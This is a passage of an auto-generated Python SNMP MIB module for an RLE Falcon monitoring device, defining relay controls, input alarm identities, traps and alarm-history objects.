if mibBuilder.loadTexts: falconRelay2Time.setStatus('mandatory')
falconRelay3 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3))
falconRelay3State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3State.setStatus('mandatory')
falconRelay3Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay3Status.setStatus('mandatory')
falconRelay3Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Label.setStatus('mandatory')
falconRelay3Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 3, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay3Time.setStatus('mandatory')
falconRelay4 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4))
falconRelay4State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4State.setStatus('mandatory')
falconRelay4Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay4Status.setStatus('mandatory')
falconRelay4Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Label.setStatus('mandatory')
falconRelay4Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 4, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay4Time.setStatus('mandatory')
falconRelay5 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5))
falconRelay5State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5State.setStatus('mandatory')
falconRelay5Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay5Status.setStatus('mandatory')
falconRelay5Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Label.setStatus('mandatory')
falconRelay5Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 5, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay5Time.setStatus('mandatory')
falconRelay6 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6))
falconRelay6State = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normallyoff", 1), ("normallyon", 2), ("forceon", 3), ("forceoff", 4), ("keypascontrolled", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6State.setStatus('mandatory')
falconRelay6Status = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("normaloff", 1), ("normalon", 2), ("forcedon", 3), ("forcedoff", 4), ("keycodeactive", 5), ("alarmedactive", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconRelay6Status.setStatus('mandatory')
falconRelay6Label = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 3), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Label.setStatus('mandatory')
falconRelay6Time = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 4, 6, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-2147483648, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconRelay6Time.setStatus('mandatory')
# falconAlarms (...1.1.1.5): active-alarm count, a table of active alarms
# (indexed by falconAlarmId, each row carrying an OID reference in
# falconAlarmDescr), and the registry of well-known alarm identities below.
falconAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5))
falconAlarmsPresent = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmsPresent.setStatus('current')
falconAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2), )
if mibBuilder.loadTexts: falconAlarmTable.setStatus('current')
falconAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1), ).setIndexNames((0, "RLE-FALCON-MIB", "falconAlarmId"))
if mibBuilder.loadTexts: falconAlarmEntry.setStatus('current')
# Index column: no max-access set, consistent with a not-accessible table index.
falconAlarmId = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 1), PositiveInteger())
if mibBuilder.loadTexts: falconAlarmId.setStatus('current')
falconAlarmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 2, 1, 2), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmDescr.setStatus('current')
# Well-known alarm identities for analog inputs 1-8: four per input in OID
# order High, Low, High2, Low2 (sub-ids 1..32 under ...5.3).
falconWellKnownAlarms = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3))
falconInput1HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 1))
if mibBuilder.loadTexts: falconInput1HighAlarm.setStatus('current')
falconInput1LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 2))
if mibBuilder.loadTexts: falconInput1LowAlarm.setStatus('current')
falconInput1High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 3))
if mibBuilder.loadTexts: falconInput1High2Alarm.setStatus('current')
falconInput1Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 4))
if mibBuilder.loadTexts: falconInput1Low2Alarm.setStatus('current')
falconInput2HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 5))
if mibBuilder.loadTexts: falconInput2HighAlarm.setStatus('current')
falconInput2LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 6))
if mibBuilder.loadTexts: falconInput2LowAlarm.setStatus('current')
falconInput2High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 7))
if mibBuilder.loadTexts: falconInput2High2Alarm.setStatus('current')
falconInput2Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 8))
if mibBuilder.loadTexts: falconInput2Low2Alarm.setStatus('current')
falconInput3HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 9))
if mibBuilder.loadTexts: falconInput3HighAlarm.setStatus('current')
falconInput3LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 10))
if mibBuilder.loadTexts: falconInput3LowAlarm.setStatus('current')
falconInput3High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 11))
if mibBuilder.loadTexts: falconInput3High2Alarm.setStatus('current')
falconInput3Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 12))
if mibBuilder.loadTexts: falconInput3Low2Alarm.setStatus('current')
falconInput4HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 13))
if mibBuilder.loadTexts: falconInput4HighAlarm.setStatus('current')
falconInput4LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 14))
if mibBuilder.loadTexts: falconInput4LowAlarm.setStatus('current')
falconInput4High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 15))
if mibBuilder.loadTexts: falconInput4High2Alarm.setStatus('current')
falconInput4Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 16))
if mibBuilder.loadTexts: falconInput4Low2Alarm.setStatus('current')
falconInput5HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 17))
if mibBuilder.loadTexts: falconInput5HighAlarm.setStatus('current')
falconInput5LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 18))
if mibBuilder.loadTexts: falconInput5LowAlarm.setStatus('current')
falconInput5High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 19))
if mibBuilder.loadTexts: falconInput5High2Alarm.setStatus('current')
falconInput5Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 20))
if mibBuilder.loadTexts: falconInput5Low2Alarm.setStatus('current')
falconInput6HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 21))
if mibBuilder.loadTexts: falconInput6HighAlarm.setStatus('current')
falconInput6LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 22))
if mibBuilder.loadTexts: falconInput6LowAlarm.setStatus('current')
falconInput6High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 23))
if mibBuilder.loadTexts: falconInput6High2Alarm.setStatus('current')
falconInput6Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 24))
if mibBuilder.loadTexts: falconInput6Low2Alarm.setStatus('current')
falconInput7HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 25))
if mibBuilder.loadTexts: falconInput7HighAlarm.setStatus('current')
falconInput7LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 26))
if mibBuilder.loadTexts: falconInput7LowAlarm.setStatus('current')
falconInput7High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 27))
if mibBuilder.loadTexts: falconInput7High2Alarm.setStatus('current')
falconInput7Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 28))
if mibBuilder.loadTexts: falconInput7Low2Alarm.setStatus('current')
falconInput8HighAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 29))
if mibBuilder.loadTexts: falconInput8HighAlarm.setStatus('current')
falconInput8LowAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 30))
if mibBuilder.loadTexts: falconInput8LowAlarm.setStatus('current')
falconInput8High2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 31))
if mibBuilder.loadTexts: falconInput8High2Alarm.setStatus('current')
falconInput8Low2Alarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 32))
if mibBuilder.loadTexts: falconInput8Low2Alarm.setStatus('current')
# Digital-alarm identities for inputs 1-20 at sub-ids 81..100 under ...5.3,
# followed by power alarms (onBattery=102, lowBattery=103; 101 is unused here).
falconInput1DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 81))
if mibBuilder.loadTexts: falconInput1DigAlarm.setStatus('current')
falconInput2DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 82))
if mibBuilder.loadTexts: falconInput2DigAlarm.setStatus('current')
falconInput3DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 83))
if mibBuilder.loadTexts: falconInput3DigAlarm.setStatus('current')
falconInput4DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 84))
if mibBuilder.loadTexts: falconInput4DigAlarm.setStatus('current')
falconInput5DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 85))
if mibBuilder.loadTexts: falconInput5DigAlarm.setStatus('current')
falconInput6DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 86))
if mibBuilder.loadTexts: falconInput6DigAlarm.setStatus('current')
falconInput7DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 87))
if mibBuilder.loadTexts: falconInput7DigAlarm.setStatus('current')
falconInput8DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 88))
if mibBuilder.loadTexts: falconInput8DigAlarm.setStatus('current')
falconInput9DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 89))
if mibBuilder.loadTexts: falconInput9DigAlarm.setStatus('current')
falconInput10DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 90))
if mibBuilder.loadTexts: falconInput10DigAlarm.setStatus('current')
falconInput11DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 91))
if mibBuilder.loadTexts: falconInput11DigAlarm.setStatus('current')
falconInput12DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 92))
if mibBuilder.loadTexts: falconInput12DigAlarm.setStatus('current')
falconInput13DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 93))
if mibBuilder.loadTexts: falconInput13DigAlarm.setStatus('current')
falconInput14DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 94))
if mibBuilder.loadTexts: falconInput14DigAlarm.setStatus('current')
falconInput15DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 95))
if mibBuilder.loadTexts: falconInput15DigAlarm.setStatus('current')
falconInput16DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 96))
if mibBuilder.loadTexts: falconInput16DigAlarm.setStatus('current')
falconInput17DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 97))
if mibBuilder.loadTexts: falconInput17DigAlarm.setStatus('current')
falconInput18DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 98))
if mibBuilder.loadTexts: falconInput18DigAlarm.setStatus('current')
falconInput19DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 99))
if mibBuilder.loadTexts: falconInput19DigAlarm.setStatus('current')
falconInput20DigAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 100))
if mibBuilder.loadTexts: falconInput20DigAlarm.setStatus('current')
falconOnBatteryAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 102))
if mibBuilder.loadTexts: falconOnBatteryAlarm.setStatus('current')
falconLowBatteryAlarm = ObjectIdentity((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 5, 3, 103))
if mibBuilder.loadTexts: falconLowBatteryAlarm.setStatus('current')
# falconTraps (...1.1.1.6): notification types, registered under the SMIv2
# ".0" sub-arc (OID suffix (0, n)).
falconTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6))
falconAlarmEntryAdded = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,1))
falconAlarmEntryRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,2))
falconAccessGranted = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,3))
falconAccessDenied = NotificationType((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 6) + (0,4))
# falconAlarmHistory (...1.1.1.7): history entry count, a write-to-clear
# control scalar, and a read-only table of history text indexed by
# falconAlarmHistoryId.
falconAlarmHistory = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7))
falconAlarmHistoryEntries = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmHistoryEntries.setStatus('current')
falconAlarmHistoryClear = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("clearbuffer", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAlarmHistoryClear.setStatus('mandatory')
falconAlarmHistoryTable = MibTable((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3), )
if mibBuilder.loadTexts: falconAlarmHistoryTable.setStatus('current')
falconAlarmHistoryEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1), ).setIndexNames((0, "RLE-FALCON-MIB", "falconAlarmHistoryId"))
if mibBuilder.loadTexts: falconAlarmHistoryEntry.setStatus('current')
# Index column: no max-access set, consistent with a not-accessible table index.
falconAlarmHistoryId = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1, 1), PositiveInteger())
if mibBuilder.loadTexts: falconAlarmHistoryId.setStatus('current')
falconAlarmHistoryText = MibTableColumn((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 7, 3, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: falconAlarmHistoryText.setStatus('current')
# falconTrapSettings (...1.1.1.8): trap persistence counter and a
# write-to-acknowledge control scalar.
falconTrapSettings = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8))
# NOTE(review): "Persistant" spelling comes from the source MIB object name;
# it is part of the exported symbol set and must not be "corrected" here.
falconPersistantTraps = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconPersistantTraps.setStatus('mandatory')
falconAlarmAcknowledge = MibScalar((1, 3, 6, 1, 4, 1, 3184, 1, 1, 1, 8, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1))).clone(namedValues=NamedValues(("acknowledgeAlarms", 1)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: falconAlarmAcknowledge.setStatus('mandatory')
# falcon8124: subtree identifier for a second product family (...1.1.3).
falcon8124 = MibIdentifier((1, 3, 6, 1, 4, 1, 3184, 1, 1, 3))
mibBuilder.exportSymbols("RLE-FALCON-MIB", falconInput7LowLimit=falconInput7LowLimit, falconInput2Reading=falconInput2Reading, falconTraps=falconTraps, falconInput10Label=falconInput10Label, falconKeypadName18=falconKeypadName18, falconInput2UOM=falconInput2UOM, falconInput5Gain=falconInput5Gain, falconRelay3=falconRelay3, falconInput20Delay=falconInput20Delay, falconKeypadName19=falconKeypadName19, falconInput7Offset=falconInput7Offset, falconInput6Hysteresis=falconInput6Hysteresis, falconInput18Reading=falconInput18Reading, falconInput20State=falconInput20State, falconInput4High2Alarm=falconInput4High2Alarm, falconAlarmHistoryEntry=falconAlarmHistoryEntry, falconInput3Low2Alarm=falconInput3Low2Alarm, falconInput13RlyControl=falconInput13RlyControl, falconRelay5=falconRelay5, falconInput8Offset=falconInput8Offset, falconInput8LowLimit=falconInput8LowLimit, falconInput20RlyControl=falconInput20RlyControl, falconKeypadCode14=falconKeypadCode14, falconInput1LowLimit=falconInput1LowLimit, falconInput16Label=falconInput16Label, falconInput2HighAlarm=falconInput2HighAlarm, falconInput7DigAlarm=falconInput7DigAlarm, falconInput7RlyControl=falconInput7RlyControl, falconInput16Reading=falconInput16Reading, falconAccessGranted=falconAccessGranted, falconAlarmHistoryClear=falconAlarmHistoryClear, falconInput7Hysteresis=falconInput7Hysteresis, falconInput8LowAlarm=falconInput8LowAlarm, falconInput1Reading=falconInput1Reading, falconInput13Reading=falconInput13Reading, falconInput15Label=falconInput15Label, falconRelay6Status=falconRelay6Status, falconIdentManufacturer=falconIdentManufacturer, falconInput9Label=falconInput9Label, falconInput2Delay=falconInput2Delay, falconInput19Reading=falconInput19Reading, falconInput7Gain=falconInput7Gain, falconInput11State=falconInput11State, falconKeypadName17=falconKeypadName17, falconRelay6Label=falconRelay6Label, falconInput8Gain=falconInput8Gain, falconInput5State=falconInput5State, falconInput11Delay=falconInput11Delay, 
falconInput4Gain=falconInput4Gain, falconInput8HighLimit2=falconInput8HighLimit2, falconInput16DigAlarm=falconInput16DigAlarm, falconInput5HighLimit=falconInput5HighLimit, falconInput1LowAlarm=falconInput1LowAlarm, falconInput4HighLimit2=falconInput4HighLimit2, falconKeypadName2=falconKeypadName2, falconInput5Reading=falconInput5Reading, falconRelay3State=falconRelay3State, falconInput10State=falconInput10State, falconKeypadCode10=falconKeypadCode10, falconRelay1Label=falconRelay1Label, falconInput2Hysteresis=falconInput2Hysteresis, falconInput17RlyControl=falconInput17RlyControl, falconInput4Offset=falconInput4Offset, falconInput7Label=falconInput7Label, falconInput7HighLimit=falconInput7HighLimit, falconInput5Hysteresis=falconInput5Hysteresis, falconInput6Delay=falconInput6Delay, falconInput12RlyControl=falconInput12RlyControl, falconInput7=falconInput7, falconInput6UOM=falconInput6UOM, falconInput1UOM=falconInput1UOM, falconInput14Delay=falconInput14Delay, falconInput1LowLimit2=falconInput1LowLimit2, falconInput6DigAlarm=falconInput6DigAlarm, falconWellKnownAlarms=falconWellKnownAlarms, falconInput4Hysteresis=falconInput4Hysteresis, falconAnalogAverage=falconAnalogAverage, falconInput13Label=falconInput13Label, falconInput6Reading=falconInput6Reading, falconInput10Delay=falconInput10Delay, falconRelay4Status=falconRelay4Status, falconInput3HighAlarm=falconInput3HighAlarm, falconInput4RlyControl=falconInput4RlyControl, falconInput15DigAlarm=falconInput15DigAlarm, falconInput5Low2Alarm=falconInput5Low2Alarm, falconInput8Label=falconInput8Label, falconInput17=falconInput17, falconKeypadName3=falconKeypadName3, falconInput15=falconInput15, falconInput4UOM=falconInput4UOM, falconKeypadCode17=falconKeypadCode17, falconInput12Reading=falconInput12Reading, falconInput6LowLimit2=falconInput6LowLimit2, falconKeypadCode2=falconKeypadCode2, falconInput4HighLimit=falconInput4HighLimit, falconKeypadCode7=falconKeypadCode7, falconInput11Reading=falconInput11Reading, 
falconRelay5Time=falconRelay5Time, falconKeypadCode8=falconKeypadCode8, falconInput14Label=falconInput14Label, falconKeypadCode16=falconKeypadCode16, falconKeypadCode19=falconKeypadCode19, falconInput2DigAlarm=falconInput2DigAlarm, falconKeypadName10=falconKeypadName10, falconInput19State=falconInput19State, falconKeypadCode12=falconKeypadCode12, falconRelay5State=falconRelay5State, falconKeypadName9=falconKeypadName9, falconInput20DigAlarm=falconInput20DigAlarm, falconInput6LowLimit=falconInput6LowLimit, falconTrapSettings=falconTrapSettings, falconInput6LowAlarm=falconInput6LowAlarm, falconInput2HighLimit=falconInput2HighLimit, falconInput10=falconInput10, falconInput8HighAlarm=falconInput8HighAlarm, falconInput5UOM=falconInput5UOM, falconInput1Delay=falconInput1Delay, falconInput6State=falconInput6State, falconInput5DigAlarm=falconInput5DigAlarm, falconInput2State=falconInput2State, falconInput6Label=falconInput6Label, falconInput5Delay=falconInput5Delay, falconInput17State=falconInput17State, falconInput1DigAlarm=falconInput1DigAlarm, falconAlarmHistory=falconAlarmHistory, falconInput14State=falconInput14State, falconAlarmAcknowledge=falconAlarmAcknowledge, falconInput7Delay=falconInput7Delay, falcon=falcon, falconLowBatteryThreshold=falconLowBatteryThreshold, falconInput4LowLimit=falconInput4LowLimit, falconInput3High2Alarm=falconInput3High2Alarm, falconInput3LowLimit2=falconInput3LowLimit2, falconInput16RlyControl=falconInput16RlyControl, falconInput2RlyControl=falconInput2RlyControl, falconInput8Reading=falconInput8Reading, falconInput14RlyControl=falconInput14RlyControl, falconInput18=falconInput18, falconAlarmId=falconAlarmId, falconInputs=falconInputs, falconInput5RlyControl=falconInput5RlyControl, falconInput5Offset=falconInput5Offset, falconInput1Low2Alarm=falconInput1Low2Alarm, falconInput6HighLimit=falconInput6HighLimit, falconSystem=falconSystem, falconInput3Delay=falconInput3Delay, falconInput6=falconInput6, falconInput13Delay=falconInput13Delay, 
falconKeypadName1=falconKeypadName1, falconInput5Label=falconInput5Label, falconInput19Delay=falconInput19Delay, falconInput5HighAlarm=falconInput5HighAlarm, falconKeypadCode13=falconKeypadCode13, falconInput18Label=falconInput18Label, falconAlarmEntryAdded=falconAlarmEntryAdded, falconInput7Low2Alarm=falconInput7Low2Alarm, falconInput7LowAlarm=falconInput7LowAlarm, falconKeypadCode15=falconKeypadCode15, falconOnBatteryAlarm=falconOnBatteryAlarm, falconInput2Gain=falconInput2Gain, falconInput12DigAlarm=falconInput12DigAlarm, falconInput18RlyControl=falconInput18RlyControl, falconKeypadCode1=falconKeypadCode1, falconPersistantTraps=falconPersistantTraps, falconInput4LowAlarm=falconInput4LowAlarm, falconInput17Label=falconInput17Label, falconKeypadCode18=falconKeypadCode18, falconKeypadName12=falconKeypadName12, falconInput1State=falconInput1State, falconInput6Gain=falconInput6Gain, falconInput10DigAlarm=falconInput10DigAlarm, falconKeypadName15=falconKeypadName15, falconInput9DigAlarm=falconInput9DigAlarm, falconKeypadCode5=falconKeypadCode5, falconInput13State=falconInput13State, falconInput12Delay=falconInput12Delay, falconRelay2Time=falconRelay2Time, falconClock=falconClock, falconIdentModel=falconIdentModel, falconIdentSoftwareVersion=falconIdentSoftwareVersion, falconInput4Delay=falconInput4Delay, falconInput4Reading=falconInput4Reading, falconRelay1State=falconRelay1State, falconInput17DigAlarm=falconInput17DigAlarm, falconRelay3Time=falconRelay3Time, falconInput7UOM=falconInput7UOM, falconInput14Reading=falconInput14Reading, falconInput10RlyControl=falconInput10RlyControl, falconInput7State=falconInput7State, falconInput3DigAlarm=falconInput3DigAlarm, falconRelay2Label=falconRelay2Label, falconInput3LowLimit=falconInput3LowLimit, falcon8124=falcon8124, falconRelay6State=falconRelay6State, falconAlarmEntryRemoved=falconAlarmEntryRemoved, falconKeypadName8=falconKeypadName8, falconAlarmHistoryId=falconAlarmHistoryId, falconOutputs=falconOutputs, 
